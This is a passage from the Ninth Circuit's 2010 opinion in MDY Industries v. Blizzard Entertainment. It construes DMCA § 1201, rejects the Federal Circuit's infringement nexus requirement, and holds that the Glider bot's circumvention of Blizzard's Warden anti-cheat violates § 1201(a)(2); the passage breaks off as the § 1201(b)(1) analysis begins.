Case: 09-16044 12/14/2010 Page: 22 of 47 ID: 7579806 DktEntry: 54-1
measures that protect the copyright itself: it entitles copyright
owners to protect their existing exclusive rights under the
Copyright Act. Those exclusive rights are reproduction, distri-
bution, public performance, public display, and creation of
derivative works. 17 U.S.C. § 106. Historically speaking, pre-
venting “access” to a protected work in itself has not been a
right of a copyright owner arising from the Copyright Act.
5
[14] Our construction of § 1201 is compelled by the four
significant textual differences between §§ 1201(a) and (b).
First, § 1201(a)(2) prohibits the circumvention of a measure
that “effectively controls access to a work protected under
this title,” whereas § 1201(b)(1) concerns a measure that “ef-
fectively protects a right of a copyright owner under this title
in a work or portion thereof.” (emphasis added). We read
§ 1201(b)(1)’s language — “right of a copyright owner under
this title” — to reinforce copyright owners’ traditional exclu-
sive rights under § 106 by granting them an additional cause
of action against those who traffic in circumventing devices
that facilitate infringement. Sections 1201(a)(1) and (a)(2),
however, use the term “work protected under this title.” Nei-
ther of these two subsections explicitly refers to traditional
copyright infringement under § 106. Accordingly, we read
this term as extending a new form of protection, i.e., the right
to prevent circumvention of access controls, broadly to works
protected under Title 17, i.e., copyrighted works.
Second, as used in § 1201(a), to “circumvent a technologi-
cal measure” means “to descramble a scrambled work, to
decrypt an encrypted work, or otherwise to avoid, bypass,
remove, deactivate, or impair a technological measure, with-
out the authority of the copyright owner.” 17 U.S.C.
517 U.S.C. § 106; see also Jay Dratler, Cyberlaw: Intellectual Prop. in
the Digital Millennium, § 1.02 (2009) (stating that the DMCA’s “protec-
tion is also quite different from the traditional exclusive rights of the copy-
right holder . . . [where the] exclusive rights never implicated access to the
work, as such”).
20004
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 23 of 47 ID: 7579806 DktEntry: 54-1
§ 1201(a)(3)(A). These two specific examples of unlawful cir-
cumvention under § 1201(a) — descrambling a scrambled
work and decrypting an encrypted work — are acts that do
not necessarily infringe or facilitate infringement of a copy-
right.
6 Descrambling or decrypting only enables someone to
watch or listen to a work without authorization, which is not
necessarily an infringement of a copyright owner’s traditional
exclusive rights under § 106. Put differently, descrambling
and decrypting do not necessarily result in someone’s repro-
ducing, distributing, publicly performing, or publicly display-
ing the copyrighted work, or creating derivative works based
on the copyrighted work.
The third significant difference between the subsections is
that § 1201(a)(1)(A) prohibits circumventing an effective
access control measure, whereas § 1201(b) prohibits traffick-
ing in circumventing devices, but does not prohibit circum-
vention itself because such conduct was already outlawed as
copyright infringement. The Senate Judiciary Committee
explained:
This . . . is the reason there is no prohibition on con-
duct in 1201(b) akin to the prohibition on circum-
vention conduct in 1201(a)(1). The prohibition in
1201(a)(1) is necessary because prior to this Act, the
conduct of circumvention was never before made
unlawful. The device limitation on 1201(a)(2)
enforces this new prohibition on conduct. The copy-
right law has long forbidden copyright infringe-
ments, so no new prohibition was necessary.
S. Rep. No. 105-90, at 11 (1998). This difference reinforces
our reading of § 1201(b) as strengthening copyright owners’
traditional rights against copyright infringement and of
6Perhaps for this reason, Congress did not list descrambling and decryp-
ting as circumventing acts that would violate § 1201(b)(1). See 17 U.S.C.
§ 1201(b)(2)(A).
20005
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 24 of 47 ID: 7579806 DktEntry: 54-1
§ 1201(a) as granting copyright owners a new anti-
circumvention right.
Fourth, in § 1201(a)(1)(B)-(D), Congress directs the
Library of Congress (“Library”) to identify classes of copy-
righted works for which “noninfringing uses by persons who
are users of a copyrighted work are, or are likely to be,
adversely affected, and the [anti-circumvention] prohibition
contained in [§ 1201(a)(1)(A)] shall not apply to such users
with respect to such classes of works for the ensuing 3-year
period.” There is no analogous provision in § 1201(b). We
impute this lack of symmetry to Congress’ need to balance
copyright owners’ new anti-circumvention right with the pub-
lic’s right to access the work. Cf. H.R. Rep. No. 105-551, pt.
2, at 26 (1998) (specifying that the House Commerce Com-
mittee “endeavored to specify, with as much clarity as possi-
ble, how the right against anti-circumvention (sic) would be
qualified to maintain balance between the interests of content
creators and information users.”). Sections 1201(a)(1)(B)-(D)
thus promote the public’s right to access by allowing the
Library to exempt circumvention of effective access control
measures in particular situations where it concludes that the
public’s right to access outweighs the owner’s interest in
restricting access.
7 In limiting the owner’s right to control
access, the Library does not, and is not permitted to, authorize
infringement of a copyright owner’s traditional exclusive
rights under the copyright. Rather, the Library is only entitled
to moderate the new anti-circumvention right created by, and
hence subject to the limitations in, DMCA § 1201(a)(1).
8
7For instance, pursuant to § 1201(a), the Library of Congress recently
approved circumvention of the technological measures contained on the
iPhone and similar wireless phone handsets known as “smartphones,” in
order to allow users to install and run third-party software applications on
these phones. See http://www.copyright.gov/fedreg/2010/75fr43825.pdf.
8In addition to these four textual differences, we note that § 1201(a)(2)
prohibits the circumvention of “a technological measure,” and
§ 1201(b)(1) prohibits the circumvention “of protection afforded by a
20006
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 25 of 47 ID: 7579806 DktEntry: 54-1
Our reading of §§ 1201(a) and (b) ensures that neither sec-
tion is rendered superfluous. A violation of § 1201(a)(1)(A),
which prohibits circumvention itself, will not be a violation of
§ 1201(b), which does not contain an analogous prohibition
on circumvention. A violation of § 1201(a)(2), which prohib-
its trafficking in devices that facilitate circumvention of
access control measures, will not always be a violation of
§ 1201(b)(1), which prohibits trafficking in devices that facili-
tate circumvention of measures that protect against copyright
infringement. Of course, if a copyright owner puts in place an
effective measure that both (1) controls access and (2) pro-
tects against copyright infringement, a defendant who traffics
in a device that circumvents that measure could be liable
under both §§ 1201(a) and (b). Nonetheless, we read the dif-
ferences in structure between §§ 1201(a) and (b) as reflecting
Congress’s intent to address distinct concerns by creating dif-
ferent rights with different elements.
3. Our construction of the DMCA is consistent with the
legislative history
Although the text suffices to resolve the issues before us,
we also consider the legislative history in order to address the
parties’ arguments concerning it. Our review of that history
supports the view that Congress created a new anti-
circumvention right in § 1201(a)(2) independent of traditional
copyright infringement and granted copyright owners a new
weapon against copyright infringement in § 1201(b)(1). For
instance, the Senate Judiciary Committee report explains that
§§ 1201(a)(2) and (b)(1) are “not interchangeable”: they were
“designed to protect two distinct rights and to target two dis-
technological measure.” In our view, these terms have the same meaning,
given the presumption that a “legislative body generally uses a particular
word with a consistent meaning in a given context.” Graham County Soil
& Water Conservation Dist. v. United States ex rel. Wilson, 130 S. Ct.
1396, (2010) (quoting Erlenbaugh v. United States, 409 U.S. 239, 243
(1972)) (internal quotation marks omitted).
20007
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 26 of 47 ID: 7579806 DktEntry: 54-1
tinct classes of devices,” and “many devices will be subject
to challenge only under one of the subsections.” S. Rep. No.
105-190, at 12 (1998). That is, § 1201(a)(2) “is designed to
protect access to a copyrighted work,” while § 1201(b)(1) “is
designed to protect the traditional copyright rights of the
copyright owner.” Id. Thus, the Senate Judiciary Committee
understood § 1201 to create the following regime:
[I]f an effective technological protection measure
does nothing to prevent access to the plain text of the
work, but is designed to prevent that work from
being copied, then a potential cause of action against
the manufacturer of a device designed to circumvent
the measure lies under § 1201(b)(1), but not under
§ 1201(a)(2). Conversely, if an effective technologi-
cal protection measure limits access to the plain text
of a work only to those with authorized access, but
provides no additional protection against copying,
displaying, performing or distributing the work, then
a potential cause of action against the manufacturer
of a device designed to circumvent the measure lies
under § 1201(a)(2), but not under § 1201(b).
Id. The Senate Judiciary Committee proffered an example of
§ 1201(a) liability with no nexus to infringement, stating that
if an owner effectively protected access to a copyrighted work
by use of a password, it would violate § 1201(a)(2)(A)
[T]o defeat or bypass the password and to make the
means to do so, as long as the primary purpose of the
means was to perform this kind of act. This is
roughly analogous to making it illegal to break into
a house using a tool, the primary purpose of which
is to break into houses.
Id. at 12. The House Judiciary Committee similarly states of
§ 1201(a)(2), “The act of circumventing a technological pro-
tection measure put in place by a copyright owner to control
20008
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 27 of 47 ID: 7579806 DktEntry: 54-1
access to a copyrighted work is the electronic equivalent of
breaking into a locked room in order to obtain a copy of a
book.” See H.R. Rep. No. 105-551, pt. 1, at 17 (1998). We
note that bypassing a password and breaking into a locked
room in order to read or view a copyrighted work would not
infringe on any of the copyright owner’s exclusive rights
under § 106.
We read this legislative history as confirming Congress’s
intent, in light of the current digital age, to grant copyright
owners an independent right to enforce the prohibition against
circumvention of effective technological access controls.
9 In
§ 1201(a), Congress was particularly concerned with encour-
aging copyright owners to make their works available in digi-
tal formats such as “on-demand” or “pay-per-view,” which
allow consumers effectively to “borrow” a copy of the work
for a limited time or a limited number of uses. As the House
Commerce Committee explained:
[A]n increasing number of intellectual property
works are being distributed using a “client-server”
model, where the work is effectively “borrowed” by
the user (e.g., infrequent users of expensive software
purchase a certain number of uses, or viewers watch
a movie on a pay-per-view basis). To operate in this
environment, content providers will need both the
technology to make new uses possible and the legal
framework to ensure they can protect their work
from piracy.
9Indeed, the House Commerce Committee proposed, albeit unsuccess-
fully, to move § 1201 out of Title 17 altogether “because these regulatory
provisions have little, if anything, to do with copyright law. The anti-
circumvention provisions (and the accompanying penalty provisions for
violations of them) would be separate from, and cumulative to, the exist-
ing claims available to copyright owners.” H.R. Rep. No. 105-551 (1998),
pt. 2, at 23-24.
20009
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 28 of 47 ID: 7579806 DktEntry: 54-1
See H.R. Rep. No. 105-551 pt. 2, at 23 (1998).
[15] Our review of the legislative history supports our
reading of § 1201: that section (a) creates a new anti-
circumvention right distinct from copyright infringement,
while section (b) strengthens the traditional prohibition
against copyright infringement.
10 We now review the deci-
sions of the Federal Circuit that have interpreted § 1201 dif-
ferently.
4. The Federal Circuit’s decisions
The Federal Circuit has adopted a different approach to the
DMCA. In essence, it requires § 1201(a) plaintiffs to demon-
strate that the circumventing technology infringes or facili-
tates
infringement
of
the
plaintiff’s
copyright
(an
“infringement nexus requirement”). See Chamberlain Group,
Inc. v. Skylink Techs., Inc., 381 F.3d 1178, 1203 (Fed. Cir.
2004); Storage Tech. Corp. v. Custom Hardware Eng’g Con-
sulting, Inc., 421 F.3d 1307 (Fed. Cir. 2005).
11
The seminal decision is Chamberlain, 381 F.3d 1178 (Fed.
Cir. 2004). In Chamberlain, the plaintiff sold garage door
10The Copyright Office has also suggested that § 1201(a) creates a new
access control right independent from copyright infringement, by express-
ing its view that the fair use defense to traditional copyright infringement
does not apply to violations of § 1201(a)(1). U.S. Copyright Office, The
Digital Millennium Copyright Act of 1998: U.S. Copyright Office Sum-
mary 4 (1998), available at http://www.copyright.gov/legislation/dmca.pdf
(“Since the fair use doctrine is not a defense to the act of gaining unautho-
rized access to a work, the act of circumventing a technological measure
in order to gain access is prohibited.”).
11The Fifth Circuit in its subsequently withdrawn opinion in MGE UPS
Systems, Inc. v. GE Consumer and Industrial, Inc., 95 U.S.P.Q.2d 1632,
1635 (5th Cir. 2010), embraced the Federal Circuit’s approach in Cham-
berlain. However, its revised opinion, 622 F.3d (5th Cir. Sept. 20, 2010),
avoids the issue by determining that MGE had not shown circumvention
of its software protections. Notably, the revised opinion does not cite
Chamberlain.
20010
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 29 of 47 ID: 7579806 DktEntry: 54-1
openers (“GDOs”) with a “rolling code” security system that
purportedly reduced the risk of crime by constantly changing
the transmitter signal necessary to open the door. Id. at 1183.
Customers used the GDOs’ transmitters to send the changing
signal, which in turn opened or closed their garage doors. Id.
Plaintiff sued the defendant, who sold “universal” GDO
transmitters
for
use
with
plaintiff’s
GDOs,
under
§ 1201(a)(2). Id. at 1185. The plaintiff alleged that its GDOs
and transmitters both contained copyrighted computer pro-
grams and that its rolling code security system was a techno-
logical measure that controlled access to those programs. Id.
at 1183. Accordingly, plaintiff alleged that the defendant —
by selling GDO transmitters that were compatible with plain-
tiff’s GDOs — had trafficked in a technology that was pri-
marily used for the circumvention of a technological measure
(the rolling code security system) that effectively controlled
access to plaintiff’s copyrighted works. Id.
The Federal Circuit rejected the plaintiff’s claim, holding
that the defendant did not violate § 1201(a)(2) because, inter
alia, the defendant’s universal GDO transmitters did not
infringe or facilitate infringement of the plaintiff’s copy-
righted computer programs. Id. at 1202-03. The linchpin of
the Chamberlain court’s analysis is its conclusion that DMCA
coverage is limited to a copyright owner’s rights under the
Copyright Act as set forth in § 106 of the Copyright Act. Id.
at 1192-93. Thus, it held that § 1201(a) did not grant copy-
right owners a new anti-circumvention right, but instead,
established new causes of action for a defendant’s unautho-
rized access of copyrighted material when it infringes upon a
copyright owner’s rights under § 106. Id. at 1192, 1194.
Accordingly, a § 1201(a)(2) plaintiff was required to demon-
strate a nexus to infringement — i.e., that the defendant’s traf-
ficking in circumventing technology had a “reasonable
relationship” to the protections that the Copyright Act affords
copyright owners. Id. at 1202-03. The Federal Circuit
explained:
20011
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 30 of 47 ID: 7579806 DktEntry: 54-1
Defendants who traffic in devices that circumvent
access controls in ways that facilitate infringement
may be subject to liability under § 1201(a)(2).
Defendants who use such devices may be subject to
liability under § 1201(a)(1) whether they infringe or
not. Because all defendants who traffic in devices
that circumvent rights controls necessarily facilitate
infringement, they may be subject to liability under
§ 1201(b). Defendants who use such devices may be
subject to liability for copyright infringement. And
finally, defendants whose circumvention devices do
not facilitate infringement are not subject to § 1201
liability.
Id. at 1195 (emphasis added). Chamberlain concluded that
§ 1201(a) created a new cause of action linked to copyright
infringement, rather than a new anti-circumvention right sepa-
rate from copyright infringement, for six reasons.
First, Chamberlain reasoned that Congress enacted the
DMCA to balance the interests of copyright owners and infor-
mation users, and an infringement nexus requirement was
necessary to create an anti-circumvention right that truly
achieved that balance. Id. at 1196 (citing H.R. Rep. No. 105-
551, at 26 (1998)). Second, Chamberlain feared that copy-
right owners could use an access control right to prohibit
exclusively fair uses of their material even absent feared foul
use. Id. at 1201. Third, Chamberlain feared that § 1201(a)
would allow companies to leverage their sales into aftermar-
ket monopolies, in potential violation of antitrust law and the
doctrine of copyright misuse. Id. (citing Eastman Kodak Co.
v. Image Tech. Servs., 504 U.S. 451, 455 (1992) (antitrust);
Assessment Techs. of WI, LLC v. WIREdata, Inc., 350 F.3d
640, 647 (7th Cir. 2003) (copyright misuse)). Fourth, Cham-
berlain viewed an infringement nexus requirement as neces-
sary to prevent “absurd and disastrous results,” such as the
existence of DMCA liability for disabling a burglary alarm to
gain access to a home containing copyrighted materials. Id.
20012
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 31 of 47 ID: 7579806 DktEntry: 54-1
Fifth, Chamberlain stated that an infringement nexus
requirement might be necessary to render Congress’s exercise
of its Copyright Clause authority rational. Id. at 1200. The
Copyright Clause gives Congress “the task of defining the
scope of the limited monopoly that should be granted to
authors . . . in order to give the public appropriate access to
their work product.” Id. (citing Eldred v. Ashcroft, 537 U.S.
186, 204-05 (2003) (internal citation omitted)). Without an
infringement nexus requirement, Congress arguably would
have allowed copyright owners in § 1201(a) to deny all access
to the public by putting an effective access control measure in
place that the public was not allowed to circumvent.
Finally, the Chamberlain court viewed an infringement
nexus requirement as necessary for the Copyright Act to be
internally consistent. It reasoned that § 1201(c)(1), enacted
simultaneously, provides that “nothing in this section shall
affect rights, remedies, limitations, or defenses to copyright
infringement, including fair use, under this title.” The Cham-
berlain court opined that if § 1201(a) creates liability for
access without regard to the remainder of the Copyright Act,
it “would clearly affect rights and limitations, if not remedies
and defenses.” Id.
Accordingly, the Federal Circuit held that a DMCA
§ 1201(a)(2) action was foreclosed to the extent that the
defendant trafficked in a device that did not facilitate copy-
right infringement. Id.; see also Storage Tech., 421 F.3d 1307
(same).
5. We decline to adopt an infringement nexus requirement
[16] While we appreciate the policy considerations
expressed by the Federal Circuit in Chamberlain, we are
unable to follow its approach because it is contrary to the
plain language of the statute. In addition, the Federal Circuit
failed to recognize the rationale for the statutory construction
that we have proffered. Also, its approach is based on policy
20013
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 32 of 47 ID: 7579806 DktEntry: 54-1
concerns that are best directed to Congress in the first
instance, or for which there appear to be other reasons that do
not require such a convoluted construction of the statute’s lan-
guage.
i. Statutory inconsistencies
Were we to follow Chamberlain in imposing an infringe-
ment nexus requirement, we would have to disregard the plain
language of the statute. Moreover, there is significant textual
evidence showing Congress’s intent to create a new anti-
circumvention right in § 1201(a) distinct from infringement.
As set forth supra, this evidence includes: (1) Congress’s
choice to link only § 1201(b)(1) explicitly to infringement; (2)
Congress’s provision in § 1201(a)(3)(A) that descrambling
and decrypting devices can lead to § 1201(a) liability, even
though descrambling and decrypting devices may only enable
non-infringing access to a copyrighted work; and (3) Con-
gress’s creation of a mechanism in § 1201(a)(1)(B)-(D) to
exempt certain non-infringing behavior from § 1201(a)(1) lia-
bility, a mechanism that would be unnecessary if an infringe-
ment nexus requirement existed.
Though unnecessary to our conclusion because of the clar-
ity of the statute’s text, see United States v. Gallegos, 613
F.3d 1211, 1214 (9th Cir. 2010), we also note that the legisla-
tive history supports the conclusion that Congress intended to
prohibit even non-infringing circumvention and trafficking in
circumventing devices. Moreover, in mandating a § 1201(a)
nexus to infringement, we would deprive copyright owners of
the important enforcement tool that Congress granted them to
make sure that they are compensated for valuable non-
infringing access — for instance, copyright owners who make
movies or music available online, protected by an access con-
trol measure, in exchange for direct or indirect payment.
The Chamberlain court reasoned that if § 1201(a) creates
liability for access without regard to the remainder of the
20014
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 33 of 47 ID: 7579806 DktEntry: 54-1
Copyright Act, it “would clearly affect rights and limitations,
if not remedies and defenses.” 381 F.3d at 1200. This per-
ceived tension is relieved by our recognition that § 1201(a)
creates a new anti-circumvention right distinct from the tradi-
tional exclusive rights of a copyright owner. It follows that
§ 1201(a) does not limit the traditional framework of exclu-
sive rights created by § 106, or defenses to those rights such
as fair use.
12 We are thus unpersuaded by Chamberlain’s read-
ing of the DMCA’s text and structure.
ii. Additional interpretive considerations
Though we need no further evidence of Congress’s intent,
the parties, citing Chamberlain, proffer several other argu-
ments, which we review briefly in order to address the par-
ties’ contentions. Chamberlain relied heavily on policy
considerations to support its reading of § 1201(a). As a
threshold matter, we stress that such considerations cannot
trump the statute’s plain text and structure. Gallegos, 613
F.3d at 1214. Even were they permissible considerations in
this case, however, they would not persuade us to adopt an
infringement nexus requirement. Chamberlain feared that
§ 1201(a) would allow companies to leverage their sales into
aftermarket monopolies, in tension with antitrust law and the
doctrine of copyright misuse.
13 Id. (citing Eastman, 504 U.S.
at 455 (antitrust); Assessment Techs., 350 F.3d at 647 (copy-
12Like the Chamberlain court, we need not and do not reach the rela-
tionship between fair use under § 107 of the Copyright Act and violations
of § 1201. Chamberlain, 381 F.3d at 1199 n.14. MDY has not claimed that
Glider use is a “fair use” of WoW’s dynamic non-literal elements. Accord-
ingly, we too leave open the question whether fair use might serve as an
affirmative defense to a prima facie violation of § 1201. Id.
13Copyright misuse is an equitable defense to copyright infringement
that denies the copyright holder the right to enforce its copyright during
the period of misuse. Practice Mgmt. Info. Corp v. Am. Med. Ass’n, 121
F.3d 516, 520 (9th Cir. 1997). Since we have held that § 1201(a) creates
a right distinct from copyright infringement, we conclude that we need not
address copyright misuse in this case.
20015
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 34 of 47 ID: 7579806 DktEntry: 54-1
right misuse)). Concerning antitrust law, we note that there is
no clear issue of anti-competitive behavior in this case
because Blizzard does not seek to put a direct competitor who
offers a competing role-playing game out of business and the
parties have not argued this issue. If a § 1201(a)(2) defendant
in a future case claims that a plaintiff is attempting to enforce
its DMCA anti-circumvention right in a manner that violates
antitrust law, we will then consider the interplay between this
new anti-circumvention right and antitrust law.
Chamberlain also viewed an infringement nexus require-
ment as necessary to prevent “absurd and disastrous results,”
such as the existence of DMCA liability for disabling a bur-
glary alarm to gain access to a home containing copyrighted
materials. 381 F.3d at 1201. In addition, the Federal Circuit
was concerned that, without an infringement nexus require-
ment, § 1201(a) would allow copyright owners to deny all
access to the public by putting an effective access control
measure in place that the public is not allowed to circumvent.
381 F.3d at 1200. Both concerns appear to be overstated,
14 but
even accepting them, arguendo, as legitimate concerns, they
do not permit reading the statute as requiring the imposition
of an infringement nexus. As § 1201(a) creates a distinct
right, it does not disturb the balance between public rights and
the traditional rights of owners of copyright under the Copy-
right Act. Moreover, § 1201(a)(1)(B)-(D) allows the Library
of Congress to create exceptions to the § 1201(a) anti-
circumvention right in the public’s interest. If greater protec-
14The Chamberlain court’s assertion that the public has a constitutional
right to appropriately access copyright works during the copyright term,
381 F.3d at 1200, cited Eldred v. Ashcroft, 537 U.S. 186, 204-05 (2003).
The Eldred decision, however, was quoting the Supreme Court’s previous
decision in Sony Corp. of America v. Universal City Studios, Inc., which
discussed the public’s right of access after the copyright term. 464 U.S.
417, 429 (1984) (“[T]he limited grant [of copyright] . . . is intended to
motivate the creative activity of authors and inventors by the provision of
a special reward, and to allow the public access to the products of their
genius after the limited period of exclusive control has expired.”).
20016
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 35 of 47 ID: 7579806 DktEntry: 54-1
tion of the public’s ability to access copyrighted works is
required, Congress can provide such protection by amending
the statute.
In sum, we conclude that a fair reading of the statute (sup-
ported by legislative history) indicates that Congress created
a distinct anti-circumvention right under § 1201(a) without an
infringement nexus requirement. Thus, even accepting the
validity of the concerns expressed in Chamberlain, those con-
cerns do not authorize us to override congressional intent and
add a non-textual element to the statute. See In Re Dumont,
581 F.3d 1104, 1111 (9th Cir. 2009) (“[W]here the language
of an enactment is clear or, in modern parlance, plain, and
construction according to its terms does not lead to absurd or
impracticable consequences, the words employed are to be
taken as the final expression of the meaning intended.”).
Accordingly, we reject the imposition of an infringement
nexus requirement. We now consider whether MDY has vio-
lated §§ 1201(a)(2) and (b)(1).
E. Blizzard’s § 1201(a)(2) claim
1. WoW’s literal elements and individual non-literal
elements
[17] We agree with the district court that MDY’s Glider
does not violate DMCA § 1201(a)(2) with respect to WoW’s
literal elements
15 and individual non-literal elements, because
Warden does not effectively control access to these WoW ele-
ments. First, Warden does not control access to WoW’s literal
elements because these elements — the game client’s soft-
ware code — are available on a player’s hard drive once the
game client software is installed. Second, as the district court
found:
15We also agree with the district court that there are no genuine issues
of material fact on Blizzard’s § 1201(a)(2) claim regarding WoW’s literal
elements.
20017
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 36 of 47 ID: 7579806 DktEntry: 54-1
[WoW’s] individual nonliteral components may be
accessed by a user without signing on to the server.
As was demonstrated during trial, an owner of the
game client software may use independently pur-
chased computer programs to call up the visual
images or the recorded sounds within the game client
software. For instance, a user may call up and listen
to the roar a particular monster makes within the
game. Or the user may call up a virtual image of that
monster.
Since a player need not encounter Warden to access WoW’s
individual non-literal elements, Warden does not effectively
control access to those elements.
Our conclusion is in accord with the Sixth Circuit’s deci-
sion in Lexmark International v. Static Control Components,
387 F.3d 522 (6th Cir. 2004). In Lexmark, the plaintiff sold
laser printers equipped with an authentication sequence, veri-
fied by the printer’s copyrighted software, that ensured that
only plaintiff’s own toner cartridges could be inserted into the
printers. Id. at 530. The defendant sold microchips capable of
generating an authentication sequence that rendered other
manufacturers’ cartridges compatible with plaintiff’s printers.
Id.
The Sixth Circuit held that plaintiff’s § 1201(a)(2) claim
failed because its authentication sequence did not effectively
control access to its copyrighted computer program. Id. at
546. Rather, the mere purchase of one of plaintiff’s printers
allowed “access” to the copyrighted program. Any purchaser
could read the program code directly from the printer memory
without encountering the authentication sequence. Id. The
authentication sequence thus blocked only one form of access:
the ability to make use of the printer. However, it left intact
another form of access: the review and use of the computer
program’s literal code. Id. The Sixth Circuit explained:
20018
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 37 of 47 ID: 7579806 DktEntry: 54-1
Just as one would not say that a lock on the back
door of a house “controls access” to a house whose
front door does not contain a lock and just as one
would not say that a lock on any door of a house
“controls access” to the house after its purchaser
receives the key to the lock, it does not make sense
to say that this provision of the DMCA applies to
otherwise-readily-accessible copyrighted works. Add
to this the fact that the DMCA not only requires the
technological measure to “control access” but
requires the measure to control that access “effec-
tively,” 17 U.S.C. § 1201(a)(2), and it seems clear
that this provision does not naturally extend to a
technological measure that restricts one form of
access but leaves another route wide open.
Id. at 547.
[18] Here, a player’s purchase of the WoW game client
allows access to the game’s literal elements and individual
non-literal elements. Warden blocks one form of access to
these elements: the ability to access them while connected to
a WoW server. However, analogously to the situation in Lex-
mark, Warden leaves open the ability to access these elements
directly via the user’s computer. We conclude that Warden is
not an effective access control measure with respect to
WoW’s literal elements and individual non-literal elements,
and therefore, that MDY does not violate § 1201(a)(2) with
respect to these elements.
2. WoW’s dynamic non-literal elements
[19] We conclude that MDY meets each of the six textual
elements for violating § 1201(a)(2) with respect to WoW’s
dynamic non-literal elements. That is, MDY (1) traffics in (2)
a technology or part thereof (3) that is primarily designed,
produced, or marketed for, or has limited commercially sig-
nificant use other than (4) circumventing a technological mea-
20019
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 38 of 47 ID: 7579806 DktEntry: 54-1
sure (5) that effectively controls access (6) to a copyrighted
work. See 17 US.C. § 1201(a)(2).
The first two elements are met because MDY “traffics in a
technology or part thereof” — that is, it sells Glider. The third
and fourth elements are met because Blizzard has established
that MDY markets Glider for use in circumventing Warden,
thus satisfying the requirement of § 1201(a)(2)(C).
16 Indeed,
Glider has no function other than to facilitate the playing of
WoW. The sixth element is met because, as the district court
held, WoW’s dynamic non-literal elements constitute a copy-
righted work. See, e.g., Atari Games Corp. v. Oman, 888 F.2d
878, 884-85 (D.C. Cir. 1989) (the audiovisual display of a
computer game is copyrightable independently from the soft-
ware program code, even though the audiovisual display gen-
erated is partially dependent on user input).
16To “circumvent a technological measure” under § 1201(a) means to
“descramble a scrambled work, to decrypt an encrypted work, or other-
wise to avoid, bypass, remove, deactivate, or impair a technological mea-
sure, without the authority of the copyright owner.” 17 U.S.C.
§ 1201(a)(3)(A) (emphasis added). A circuit split exists with respect to the
meaning of the phrase “without the authority of the copyright owner.” The
Federal Circuit has concluded that this definition imposes an additional
requirement on a § 1201(a)(2) plaintiff: to show that the defendant’s cir-
cumventing device enables third parties to access the copyrighted work
without the copyright owner’s authorization. See Chamberlain, 381 F.3d
at 1193.The Second Circuit has adopted a different view, explaining that
§ 1201(a)(3)(A) plainly exempts from § 1201(a) liability those whom a
copyright owner authorizes to circumvent an access control measure, not
those whom a copyright owner authorizes to access the work. Corley, 273
F.3d at 444 & n.15; see also 321 Studios v. MGM Studios, Inc., 307 F.
Supp. 2d 1085, 1096 (N.D. Cal. 2004) (same).
We find the Second Circuit’s view to be the sounder construction of the
statute’s language, and conclude that § 1201(a)(2) does not require a plain-
tiff to show that the accused device enables third parties to access the
work without the copyright owner’s authorization. Thus, Blizzard has sat-
isfied the “circumvention” element of a § 1201(a)(2) claim, because Bliz-
zard has demonstrated that it did not authorize MDY to circumvent
Warden.
20020
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 39 of 47 ID: 7579806 DktEntry: 54-1
[20] The fifth element is met because Warden is an effec-
tive access control measure. To “effectively control access to
a work,” a technological measure must “in the ordinary course
of its operation, require[ ] the application of information, or
a process or a treatment, with the authority of the copyright
owner,
to
gain
access
to
the
work.”
17
U.S.C.
§ 1201(a)(3)(B). Both of Warden’s two components “re-
quire[ ] the application of information, or a process or a treat-
ment . . . to gain access to the work.” For a player to connect
to Blizzard’s servers which provide access to WoW’s
dynamic non-literal elements, scan.dll must scan the player’s
computer RAM and confirm the absence of any bots or
cheats. The resident component also requires a “process” in
order for the user to continue accessing the work: the user’s
computer must report portions of WoW code running in RAM
to the server. Moreover, Warden’s provisions were put into
place by Blizzard, and thus, function “with the authority of
the copyright owner.” Accordingly, Warden effectively con-
trols access to WoW’s dynamic non-literal elements.
17 We
hold that MDY is liable under § 1201(a)(2) with respect to
WoW’s dynamic non-literal elements.
18 Accordingly, we
affirm the district court’s entry of a permanent injunction
against MDY to prevent future § 1201(a)(2) violations.
17The statutory definition of the phrase “effectively control access to a
work” does not require that an access control measure be strong or
circumvention-proof. Rather, it requires an access control measure to pro-
vide some degree of control over access to a copyrighted work. As one
district court has observed, if the word “effectively” were read to mean
that the statute protects “only successful or efficacious technological
means of controlling access,” it would “gut” DMCA § 1201(a)(2), because
it would “limit the application of the statute to access control measures
that thwart circumvention, but withhold protection for those measures that
can be circumvented.” See Universal City Studios v. Reimerdes, 111 F.
Supp. 2d 294, 318 (S.D.N.Y. 2000) (“Defendants would have the Court
construe the statute to offer protection where none is needed but to with-
hold protection precisely where protection is essential.”).
18We note that the DMCA allows innocent violators to seek reduction
or remittance of damages. See 17 U.S.C. § 1203(c)(5).
20021
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 40 of 47 ID: 7579806 DktEntry: 54-1
F. Blizzard’s § 1201(b)(1) claim
[21] Blizzard may prevail under § 1201(b)(1) only if War-
den “effectively protect[s] a right” of Blizzard under the
Copyright Act. Blizzard contends that Warden protects its
reproduction right against unauthorized copying. We disagree.
First, although WoW players copy the software code into
RAM while playing the game, Blizzard’s EULA and ToU
authorize all licensed WoW players to do so. We have
